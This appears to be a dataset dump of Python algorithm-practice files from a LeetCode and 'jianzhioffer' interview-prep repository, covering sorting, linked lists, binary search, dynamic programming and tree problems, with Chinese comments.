"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/17 19:48\n# @Author : Meng Xiao\nclass Solution:\n def threeSumClosest(self, nums, target):\n if not nums or not target or len(nums) < 3:\n return\n nums.sort()\n res = nums[0] + nums[1] + nums[2]\n for i in range(len(nums) - 2):\n j = i + 1\n k = len(nums) - 1\n while j < k:\n tsum = nums[i] + nums[j] + nums[k]\n if abs(tsum - target) < abs(res - target):\n res = tsum\n if tsum < target:\n j += 1\n elif tsum > target:\n k -= 1\n else:\n j += 1\n k -= 1\n\n return res"
},
{
"alpha_fraction": 0.41046831011772156,
"alphanum_fraction": 0.4573002755641937,
"avg_line_length": 25,
"blob_id": "ce6ea354dd548d786f7db648243ab50ed4c66ba6",
"content_id": "9fa6c68366397fb5b26e171c5b0bc6526bb2d70d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 363,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/leetcode-26删除排序数组中重复项.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/25 19:58\n# @Author : Meng Xiao\nclass Solution:\n def removeDuplicates(self, nums):\n if len(nums) <= 1:\n return len(nums)\n slow = 0\n for i in range(1, len(nums)):\n if nums[slow] != nums[i]:\n slow += 1\n nums[slow] = nums[i]\n\n return slow + 1"
},
{
"alpha_fraction": 0.46947672963142395,
"alphanum_fraction": 0.4844961166381836,
"avg_line_length": 23.565475463867188,
"blob_id": "bcae0f5384a55d7a6c44f46b5aa498f1b6c50924",
"content_id": "c031c9ce4f168dd4f35e3225de5f2e72032f45d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4755,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 168,
"path": "/各种排序.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/19 下午3:04\n# @Author : Meng Xiao\n\n# 1.\ndef insert_sort(lists):\n '''\n 直接插入排序:\n 从第一个元素开始,作为已排序元素,对于未排序数据,在已排序列中\n 从后往前扫描,找到相应位置插入。\n O(n2) O(1) 稳定\n '''\n count = len(lists)\n for i in range(1, count):\n key = lists[i]\n j = i - 1\n while j >= 0:\n if lists[j] > key:\n lists[j+1] = lists[j]\n lists[j] = key\n j -= 1\n return lists\n\ndef shell_sort(lists):\n '''\n 希尔排序:\n 将整个待排序的序列分割为若干子序列分别进行直接插入排序\n O(n1.3) O(1)\n '''\n count = len(lists)\n step = 2\n group = count // step # 初始增量为数组长度的一半\n while group > 0:\n for i in range(0, group):\n j = i + group\n while j < count:\n k = j - group\n key = lists[j]\n while k >= 0:\n if lists[k] > key:\n lists[k + group] = lists[k]\n lists[k] = key\n k -= group\n j += group\n group //= step\n return lists\n\ndef select_sort(lists):\n '''\n ˙直接选择排序:\n 多趟选择,每次选择最小(大)元素放在已排末尾。\n O(n2) O(1)\n '''\n count = len(lists)\n for i in range(0, count):\n min = i\n for j in range(i + 1, count):\n if lists[min] > lists[j]:\n min = j #寻找最小的数,将最小的数索引保存\n lists[min], lists[i] = lists[i], lists[min]\n return lists\n\n\n\n\n# 堆排序,建堆,堆调整,排序\ndef adjust_heap(lists, i, size):\n lchild = 2 * i + 1\n rchild = 2 * i + 2\n max = i\n if i < size // 2:\n if lchild < size and lists[lchild] > lists[max]:\n max = lchild\n if rchild < size and lists[rchild] > lists[max]:\n max = rchild\n if max != i:\n lists[max], lists[i] = lists[i], lists[max]\n adjust_heap(lists, max, size)\n\ndef build_heap(lists, size):\n for i in range(0, (size//2))[::-1]:\n adjust_heap(lists, i, size)\n\ndef heap_sort(lists):\n size = len(lists)\n build_heap(lists, size)\n for i in range(0, size)[::-1]:\n lists[0], lists[i] = lists[i], lists[0]\n adjust_heap(lists, 0, i)\n return lists\n\ndef bubble_sort(lists):\n '''\n 两两交换 可用于内存足够的TopK\n O(n2), O(1)\n '''\n count = len(lists)\n for i in range(0,count):\n for j in range(i+1, count):\n if lists[i] > lists[j]:\n lists[i], lists[j] = lists[j], lists[i]\n return lists\n\n\ndef quick_sort(lists, left, right):\n '''\n 通过一趟排序将待排记录分隔成独立的两部分,其中一部分记录的关键字均比另一部分的关键字小,\n 则可分别对这两部分记录继续进行排序,以达到整个序列有序。\n O(nlogn) O(nlogn)\n '''\n if left >= right:\n return lists\n key = lists[left]\n low = left\n high = right\n while left < right:\n while left < right and lists[right] >= key:\n right -= 1\n lists[left] = lists[right]\n while left < right and lists[left] <= key:\n left += 1\n lists[right] = lists[left]\n lists[right] = key\n quick_sort(lists, low, left-1)\n quick_sort(lists, left+1, high)\n return lists\n\ndef merge_sort(lists):\n '''\n 归并排序,将已有序子序列合并,得到完全有序的序列\n O(nlogn), O(n) 稳定\n '''\n if len(lists) <= 1:\n return lists\n num = len(lists) // 2\n left = merge_sort(lists[:num])\n right = merge_sort(lists[num:])\n return merge(left, right)\ndef merge(left, right):\n result = []\n i ,j = 0, 0\n while i < len(left) and j < len(right):\n if left[i] <= right[j]:\n result.append(left[i])\n i += 1\n else:\n result.append(right[j])\n j += 1\n result += left[i:]\n result += right[j:]\n return result\n\ndef radix_sort(lists):\n '''\n 基数排序按照低位先排序,然后收集;再按照高位排序,然后再收集;依次类推,直到最高位。\n '''\n import math\n def radix_sort(lists, radix=10):\n k = int(math.ceil(math.log(max(lists), radix)))\n bucket = [[] for i in range(radix)]\n for i in range(1, k + 1):\n for j in lists:\n bucket[j // (radix ** (i - 1)) % (radix ** i)].append(j)\n del lists[:]\n for z in bucket:\n lists += z\n del z[:]\n return lists\n\n"
},
{
"alpha_fraction": 0.44820064306259155,
"alphanum_fraction": 0.47110140323638916,
"avg_line_length": 24.5,
"blob_id": "53ce11991ed5707bc7e49f66644b1af91a2c2071",
"content_id": "d391c94c3fa94e17142c9705055ecb005eaae93d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 973,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 36,
"path": "/字符串的排列.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/11 下午8:56\n# @Author : Meng Xiao\nclass Solution:\n\n # 全排列\n def Permutation(self, ss):\n if not ss:\n return []\n if len(ss) == 1:\n return list(ss)\n charlist = list(ss)\n charlist.sort()\n res = []\n for i in range(len(charlist)):\n if i > 0 and charlist[i] == charlist[i-1]:\n continue\n temp = self.Permutation(''.join(charlist[:i])+''.join(charlist[i+1:]))\n for j in temp:\n res.append(charlist[i] + j)\n\n return res\n\n # 全组合\n def Combination(self, ss):\n # 由于全组合含有空集,这里结果采用列表形式\n if not ss:\n return []\n res = [[]]\n charlist = list(ss)\n for i in charlist:\n for j in range(len(res)):\n res.append(res[j]+[i])\n return res\ns = Solution()\nprint(s.Permutation('111324'))"
},
{
"alpha_fraction": 0.5642105340957642,
"alphanum_fraction": 0.5894736647605896,
"avg_line_length": 38.58333206176758,
"blob_id": "ef2e7a21c9c0fbac31b09c4890fad00947c7d457",
"content_id": "12d1fc6247de020d8b449d67ce0b469b86878d85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 475,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 12,
"path": "/leetcode-236二叉树的最近公共祖先.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/31 21:56\n# @Author : Meng Xiao\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n if not root or p == root or q == root:\n return root\n left = self.lowestCommonAncestor(root.left, p, q)\n right = self.lowestCommonAncestor(root.right, p, q)\n if left and right:\n return root\n return left if right is None else right\n"
},
{
"alpha_fraction": 0.40271493792533875,
"alphanum_fraction": 0.4343891441822052,
"avg_line_length": 30.5,
"blob_id": "8127fa68e952bc21ae1ab8256544aa0d079a40d3",
"content_id": "a062636cdfb96a70ce877afb64b9f8f649d57b90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 510,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 14,
"path": "/leetcode-684冗余连接.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/9/30 17:26\n# @Author : Meng Xiao\nclass Solution:\n def findRedundantConnection(self, edges):\n\n p = {i: {i} for i in range(1, len(edges) + 1)} # 并查集初始化\n for x, y in edges:\n if p[x] is not p[y]: # 如果两个集合地址不一样\n p[x] |= p[y] # 合并集合\n for z in p[y]:\n p[z] = p[x] # 修改元素集合标记的指针地址\n else:\n return [x, y]\n\n"
},
{
"alpha_fraction": 0.35760170221328735,
"alphanum_fraction": 0.4122055768966675,
"avg_line_length": 34.92307662963867,
"blob_id": "b2f1d14092ced3bf67197372b3c004ac2e8cdceb",
"content_id": "0ef2ffab5e6cb61a89bc9d43da505d52db48ede0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 948,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 26,
"path": "/leetcode-4有序数组中位数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/5/5 21:20\n# @Author : Meng Xiao\n\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n def findKth(A, B, k):\n if len(A) == 0:\n return B[k - 1]\n if len(B) == 0:\n return A[k - 1]\n if k == 1:\n return min(A[0], B[0])\n a = A[k // 2 - 1] if len(A) >= k // 2 else None\n b = B[k // 2 - 1] if len(B) >= k // 2 else None\n if b is None or (a is not None and a < b):\n return findKth(A[k // 2:], B, k - k // 2)\n return findKth(A, B[k // 2:], k - k // 2) # 因为k/2 不一定等于k-k/2\n\n n = len(nums2) + len(nums1)\n if n % 2 == 1:\n return findKth(nums1, nums2, n // 2 + 1) / 1.0\n else:\n small = findKth(nums1, nums2, n // 2)\n big = findKth(nums1, nums2, n // 2 + 1)\n return (small + big) / 2.0\n"
},
{
"alpha_fraction": 0.4739803075790405,
"alphanum_fraction": 0.48945146799087524,
"avg_line_length": 27.479999542236328,
"blob_id": "72edc8eb937d810063034aa516252a4cf0721b97",
"content_id": "fe2415a739a7db0617437032d0d701c14df34ec0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 715,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 25,
"path": "/删除链表中重复节点.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/1 下午7:31\n# @Author : Meng Xiao\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\nclass Solution:\n def deleteDuplication(self, pHead):\n if pHead is None or pHead.next is None:\n return pHead\n first = ListNode(-1)\n first.next = pHead\n last = first\n while pHead and pHead.next:\n if pHead.val == pHead.next.val:\n val = pHead.val\n while pHead and val == pHead.val:\n pHead = pHead.next\n last.next = pHead\n else:\n last = pHead\n pHead = pHead.next\n\n return first.next"
},
{
"alpha_fraction": 0.3986014127731323,
"alphanum_fraction": 0.43706294894218445,
"avg_line_length": 29.052631378173828,
"blob_id": "8b0611dd9543188fbcf151eaee65b738f1ba2e3b",
"content_id": "d3da1c371f512a417baed31b5229664820b6741a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 576,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 19,
"path": "/0~n-1中缺失的数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午10:08\n# @Author : Meng Xiao\nclass Solution:\n def GetMissingNumber(self, numbers, length):\n if not numbers or length <= 0:\n return -1\n left = 0\n right = length - 1\n while left <= right:\n mid = (left + right) // 2\n if numbers[mid] != mid:\n if mid == 0 or numbers[mid-1] == mid - 1:\n return mid\n right = mid - 1\n else:\n left = mid + 1\n if left == length:\n return length\n\n"
},
{
"alpha_fraction": 0.47411444783210754,
"alphanum_fraction": 0.47820162773132324,
"avg_line_length": 19.375,
"blob_id": "bd7e4b7def6338917f98f20b19b34623a9d169d2",
"content_id": "b5cda1d7f01d3283261245c8938847ebf69debef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1508,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 72,
"path": "/test.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "class ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n\n def head_tail(self, head):\n\n if not head or not head.next:\n return head\n # 找中间结点\n mid = head\n right = head.next\n while right.next and right.next.next:\n mid = mid.next\n right = right.next.next\n right = mid.next\n mid.next = None\n\n right = self.reverse_list(right) # 链表反转\n\n # left和right依次相连\n cur = head\n while cur.next:\n tmp = cur.next\n cur.next = right\n right = right.next\n cur.next.next = tmp\n cur = tmp\n cur.next = right\n\n return head\n\n def reverse_list(self, head): # 就地逆\n if not head or not head.next:\n return head\n prev = None\n cur = head\n while cur:\n nxt = cur.next\n cur.next = prev\n prev = cur\n cur = nxt\n return prev\n\ndef print_list(head):\n if head == None:\n return\n while head:\n print(head.val, end=' ')\n head = head.next\n print()\n\n# 测试:\n\nif __name__ == '__main__':\n a = ListNode(1)\n b = ListNode(2)\n c = ListNode(3)\n d = ListNode(4)\n e = ListNode(5)\n f = ListNode(6)\n a.next = b\n b.next = c\n c.next = d\n d.next = e\n e.next = f\n s = Solution()\n print_list(a)\n dummy = s.head_tail(a)\n print_list(dummy)\n\n"
},
{
"alpha_fraction": 0.41993463039398193,
"alphanum_fraction": 0.46078431606292725,
"avg_line_length": 31.210525512695312,
"blob_id": "58d34fa123af4dab072b3d7d00ec6628eb83446c",
"content_id": "f63119434cf79f104a47b1c5f36f01b3a0c4aa98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 616,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 19,
"path": "/leetcode-135分发糖果.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/16 下午11:59\n# @Author : Meng Xiao\n\nclass Solution:\n def candy(self, ratings: List[int]) -> int:\n if not ratings:\n return 0\n left = [1 for _ in range(len(ratings))]\n right = left[:]\n for i in range(1, len(ratings)):\n if ratings[i] > ratings[i - 1]:\n left[i] = left[i - 1] + 1\n count = left[-1]\n for j in range(len(ratings) - 2, -1, -1):\n if ratings[j] > ratings[j + 1]:\n right[j] = right[j + 1] + 1\n count += max(left[j], right[j])\n return count\n"
},
{
"alpha_fraction": 0.46875,
"alphanum_fraction": 0.554347813129425,
"avg_line_length": 24.34482765197754,
"blob_id": "6a96cb1e03058178b8632c9cad5f6185754a2809",
"content_id": "d798e57cd60bfa3acec97b8bf2c8687eb3e61529",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 880,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 29,
"path": "/0-1背包问题.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/11 19:41\n# @Author : Meng Xiao\n'''\n输入:\n第一行是一个正整数,表示总容量\n第二行是一个长度为n的数组,代表物品重量\n第三行是一个长度为n的数组,代表物品价值\n输出:\n最大价值\nexample:\n1000\n200 600 100 180 300 450\n6 10 3 4 5 8\noutput: 21\n'''\nimport numpy as np\n# 0-1背包\nclass Solution:\n def bag0_1(self, wlist, vlist, totalWeight):\n totalLength = len(vlist) # 表示物品的数量\n dpArr = np.zeros((totalLength+1, totalWeight+1), dtype=np.int32)\n for i in range(1, totalLength+1):\n for j in range(1, totalWeight+1):\n if wlist[i-1] <= j:\n dpArr[i][j] = max(dpArr[i-1][j], dpArr[i-1][j-wlist[i-1]]+vlist[i-1])\n else:\n dpArr[i][j] = dpArr[i-1][j]\n return dpArr[-1][-1]\n\n"
},
{
"alpha_fraction": 0.40376266837120056,
"alphanum_fraction": 0.4659913182258606,
"avg_line_length": 30.454545974731445,
"blob_id": "aae210462db52ebc63d1157df9ff253c067e622a",
"content_id": "6e91afaba3059385a27b89b4daccd0035cdc21c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 22,
"path": "/礼物的最大价值.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/15 下午8:29\n# @Author : Meng Xiao\nclass Solution:\n def getMaxValue(self, values, rows, cols):\n if not values or rows <= 0 or cols <= 0:\n return 0\n max_value = [0] * cols\n for i in range(rows):\n for j in range(cols):\n left, up = 0, 0\n if i > 0:\n up = max_value[j]\n if j > 0:\n left = max_value[j-1]\n max_value[j] = max(left, up) + values[i * cols + j]\n maxValue = max_value[cols-1]\n\n return maxValue\ns = Solution()\nmatrix = [1,10,3,8,12,2,9,6,5,7,4,11,3,7,16,5]\nprint(s.getMaxValue(matrix, 4,4))"
},
{
"alpha_fraction": 0.3409818708896637,
"alphanum_fraction": 0.369263619184494,
"avg_line_length": 30.25,
"blob_id": "02037ecaef592610cc40916b8c36539d8b1a23f9",
"content_id": "7fdc803682d9f5c3494d0693be328630174549bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2048,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 60,
"path": "/leetcode-5最长回文子串.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/5/7 19:32\n# @Author : Meng Xiao\nclass Solution:\n# 法1 : 依次把每个字符作为回文字符串的中间字符。\n def longestPalindrome1(self, s):\n n = len(s)\n maxLength = 0\n left = right = 0\n for i in range(n):\n # 长度为奇数情况:\n for j in range(min(i+1, n-i)):\n if s[i-j] != s[i+j]:\n break\n if 2 * j + 1 > maxLength:\n maxLength = 2 * j + 1\n left = i - j\n right = i + j\n # 偶数\n if i + 1 < n and s[i] == s[i+1]:\n for j in range(min(i+1, n-i-1)):\n if s[i-j] != s[i+1+j]:\n break\n if 2 * j + 2 > maxLength:\n maxLength = 2 * j + 2\n left = i - j\n right = i + j + 1\n return s[left:right+1]\n\n # 法2:Manacher算法.https://www.felix021.com/blog/read.php?2040\n def longestPalindrome2(self, s):\n def preProcess(s):\n if not s:\n return ['^', '$']\n T = ['^']\n for i in s:\n T += ['#', i]\n T += ['#', '$']\n return T\n T = preProcess(s)\n P = [0] * len(T) # P[i]表示以s[i]为回文串中心时,此回文串的长度\n id, mx = 0, 0 # id表示最大回文串中心的位置,mx则为id+P[id],即最大回文串的右边界\n for i in range(1, len(T)-1):\n j = 2 * id - i # j为i关于id的对称位置\n if mx > i:\n P[i] = min(P[j], mx-i)\n else:\n P[i] = 0\n while T[i+P[i]+1] == T[i-P[i]-1]:\n P[i] += 1\n if i + P[i] > mx:\n id, mx = i, i + P[i]\n max_i = P.index(max(P))\n start = (max_i - P[max_i] - 1) // 2\n res = s[start:start+P[max_i]]\n return res\n\n\ns = Solution()\nprint(s.longestPalindrome2('babad'))"
},
{
"alpha_fraction": 0.4092409312725067,
"alphanum_fraction": 0.4532453119754791,
"avg_line_length": 24.97142791748047,
"blob_id": "b8626bd3f86e83c8e42dfb11ffb4ee4b32974154",
"content_id": "97605542d5f5cf5b5ab753fab9c790a24e93ffe5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 909,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 35,
"path": "/leetcode-2.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/5/5 20:46\n# @Author : Meng Xiao\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n\n def addTwoNumbers(self, l1, l2):\n if not l1:\n return l2\n if not l2:\n return l1\n cur = head = ListNode(-1)\n carry = 0\n while l1 and l2:\n value = (l1.val + l2.val + carry) % 10\n carry = (l1.val + l2.val + carry) // 10\n cur.next = ListNode(value)\n cur = cur.next\n l1 = l1.next\n l2 = l2.next\n rest = l1 or l2\n while rest:\n value = (rest.val + carry) % 10\n cur.next = ListNode(value)\n carry = (rest.val + carry) // 10\n cur = cur.next\n rest = rest.next\n if carry:\n cur.next = ListNode(1)\n return head.next\n"
},
{
"alpha_fraction": 0.39759036898612976,
"alphanum_fraction": 0.4277108311653137,
"avg_line_length": 22.75,
"blob_id": "2123223fc0828f0a3adb909c5ca082dd033aa370",
"content_id": "87c3a653bcb1847285fbd35e40a99d8ed9271b71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 668,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 28,
"path": "/质因数分解.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/22 下午5:24\n# @Author : Meng Xiao\nclass Solution:\n def is_Prime(self, n):\n for i in range(2,int(n ** 0.5)+1):\n flag = n % i\n if flag == 0:\n return False\n return True\n def prime_de(self, n):\n if self.is_Prime(n):\n return [n]\n prime = []\n for i in range(2, n//2):\n if self.is_Prime(i):\n prime.append(i)\n print(prime)\n for item in prime:\n while n % item == 0:\n print(item)\n n /= item\n continue\n return\n\n\ns = Solution()\nprint(s.prime_de(4))"
},
{
"alpha_fraction": 0.36920660734176636,
"alphanum_fraction": 0.4014139771461487,
"avg_line_length": 26.69565200805664,
"blob_id": "2dec79b88b2518d7bf943ef3c4997d89afd709f1",
"content_id": "7a41c3c9ad9b76b879425d33190c030c2faf1db2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1277,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 46,
"path": "/数字在排序数组中出现的次数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午9:55\n# @Author : Meng Xiao\nclass Solution:\n\n def GetNumberOfK(self, data, k):\n if not data:\n return 0\n if self.GetFirstK(data, k) == -1 and self.GetLastK(data, k) == -1:\n return 0\n return self.GetLastK(data, k) - self.GetFirstK(data, k) + 1\n\n def GetFirstK(self, data, k):\n low = 0\n high = len(data) - 1\n while low <= high:\n mid = (low+high) // 2\n if data[mid] < k:\n low = mid + 1\n elif data[mid] > k:\n high = mid - 1\n else:\n if mid == low or data[mid-1] != k:\n return mid\n else:\n high = mid - 1\n return -1\n\n def GetLastK(self, data, k):\n low = 0\n high = len(data) - 1\n while low <= high:\n mid = (low + high) // 2\n if data[mid] < k:\n low = mid + 1\n elif data[mid] > k:\n high = mid - 1\n else:\n if mid == high or data[mid + 1] != k:\n return mid\n else:\n low = mid + 1\n return -1\n\ns = Solution()\nprint(s.GetNumberOfK([1,2,3,3,3,3,4,5],3))"
},
{
"alpha_fraction": 0.3979797959327698,
"alphanum_fraction": 0.4505050480365753,
"avg_line_length": 25.105262756347656,
"blob_id": "e51265bca6e1e25286b37a076e2e0406ffa04349",
"content_id": "ac5794682d7f4cbec0def1932522403fc5775c2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 499,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 19,
"path": "/构建乘积数组.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午10:11\n# @Author : Meng Xiao\nclass Solution:\n def multiply(self, A):\n if not A or len(A) <= 0:\n return\n length = len(A)\n lis = [1] * length\n for i in range(1, length):\n lis[i] = lis[i-1] * A[i-1]\n print(lis)\n temp = 1\n for i in range(length-2, -1, -1):\n temp = temp * A[i+1]\n lis[i] *= temp\n return lis\ns = Solution()\nprint(s.multiply([1,2,3,4]))"
},
{
"alpha_fraction": 0.4810379147529602,
"alphanum_fraction": 0.514970064163208,
"avg_line_length": 24.71794891357422,
"blob_id": "adeac9b34f472ef9691233540309230ce479cf2e",
"content_id": "89f03878a25584cac948ccb9ae961e4ac75db62c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1020,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 39,
"path": "/aaa.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# 线段\ndef func(num_list):\n start = 1000\n end = 0\n for one_list in num_list:\n if one_list[0] < start:\n start = one_list[0]\n if one_list[1] > end:\n end = one_list[1]\n print(start, end)\n\n flag = [False] * end\n for i in range(len(num_list)):\n for j in range(num_list[i][0], num_list[i][1]):\n flag[j] = True\n print(flag)\n return flag.count(True)\n\n# n_list = [[1,3],[2,7],[9,11],[13,20],[15,30]]\n# print(func(n_list))\n\n# 最大不重复子串\ndef LongestSubStr(s):\n if not s or len(s) < 2:\n return s\n pindex = [-1] * 26\n curLength = 0\n maxLength = 0\n for i in range(len(s)):\n preIndex = pindex[ord(s[i])-ord('a')]\n if preIndex < 0 or i - preIndex > curLength:\n curLength += 1\n else:\n if curLength > maxLength:\n maxLength = curLength\n curLength = i - preIndex\n pindex[ord(s[i]) - ord('a')] = i\n return maxLength\nprint(LongestSubStr('arabcacfr'))"
},
{
"alpha_fraction": 0.3368421196937561,
"alphanum_fraction": 0.3684210479259491,
"avg_line_length": 26.214284896850586,
"blob_id": "b5ecbcf6b06ce178b251713325b45b8a2967c424",
"content_id": "d6d631f9304e17acd2947dfdaab0174de054a411",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 380,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 14,
"path": "/leetcode-20有效的括号.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/17 20:39\n# @Author : Meng Xiao\nclass Solution:\n def isValid(self, s):\n mp = {')': '(', ']': '[', '}': '{'}\n stk = []\n for ch in s:\n if ch in '([{':\n stk.append(ch)\n else:\n if not stk or mp[ch] != stk.pop():\n return False\n return not stk"
},
{
"alpha_fraction": 0.5207316875457764,
"alphanum_fraction": 0.54756098985672,
"avg_line_length": 19,
"blob_id": "8fb2bd0bc1b5e7fa24ab3bdd5ec0232d52aec358",
"content_id": "7ba037144bfa1036473d5478aa6492a8f7378737",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 824,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 41,
"path": "/平衡二叉树.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/17 下午9:20\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def __init__(self):\n self.flag = True\n\n def isBalanced(self, root):\n self.getDepth(root)\n return self.flag\n\n def getDepth(self, root):\n if not root:\n return 0\n left = self.getDepth(root.left) + 1\n right = self.getDepth(root.right) + 1\n if abs(left - right) > 1:\n self.flag = False\n return max(left, right)\n\ns = Solution()\na = TreeNode(1)\nb = TreeNode(2)\nc = TreeNode(3)\nd = TreeNode(4)\ne = TreeNode(5)\nf = TreeNode(6)\ng = TreeNode(7)\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\ne.left = g\n\nprint(s.isBalanced(a))\n"
}
] | 99 |
Charnub/chessington-python
|
https://github.com/Charnub/chessington-python
|
fe44b724e570c308638cf6f6d439bb3032bd4cfb
|
d0e94bedb586b7886b945cf22e1937b62b747031
|
9b05ca1cb46f06c97f4dd440bda853879e073659
|
refs/heads/master
| 2020-07-27T23:54:10.835241 | 2019-09-18T15:54:16 | 2019-09-18T15:54:16 | 209,248,525 | 0 | 0 | null | 2019-09-18T07:42:19 | 2019-08-01T12:56:14 | 2019-08-01T14:36:29 | null |
[
{
"alpha_fraction": 0.6047889590263367,
"alphanum_fraction": 0.6131819486618042,
"avg_line_length": 30.169231414794922,
"blob_id": "3a48776fbe24c3f600e249801dbf0ac0c0926625",
"content_id": "55e83e099a0a336851d31a09226262872a6b17ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4051,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 130,
"path": "/chessington/engine/pieces.py",
"repo_name": "Charnub/chessington-python",
"src_encoding": "UTF-8",
